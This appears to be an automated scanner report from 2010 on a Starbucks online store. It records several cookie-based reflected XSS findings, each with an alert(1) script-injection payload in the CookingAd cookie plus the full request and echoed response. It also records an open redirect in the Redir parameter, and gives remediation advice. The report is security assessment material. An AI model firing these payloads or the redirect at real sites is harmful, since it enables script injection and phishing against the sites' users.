<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... ve Coffee Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Reserve Coffee Page" var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-reserve/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... eName="Starbucks VIA Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks VIA Page" var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-via/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close
<head> <title>Tea at Starbucks Store</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> ...[SNIP]... ageName="Tazo Tea HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Tazo Tea HomePage" var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D" var s_prop4="" var s_prop5="" var s_prop6="/tea/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state= ...[SNIP]...
The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 ...[SNIP]...
Report generated by Hoyt LLC at Tue Nov 16 13:25:22 CST 2010.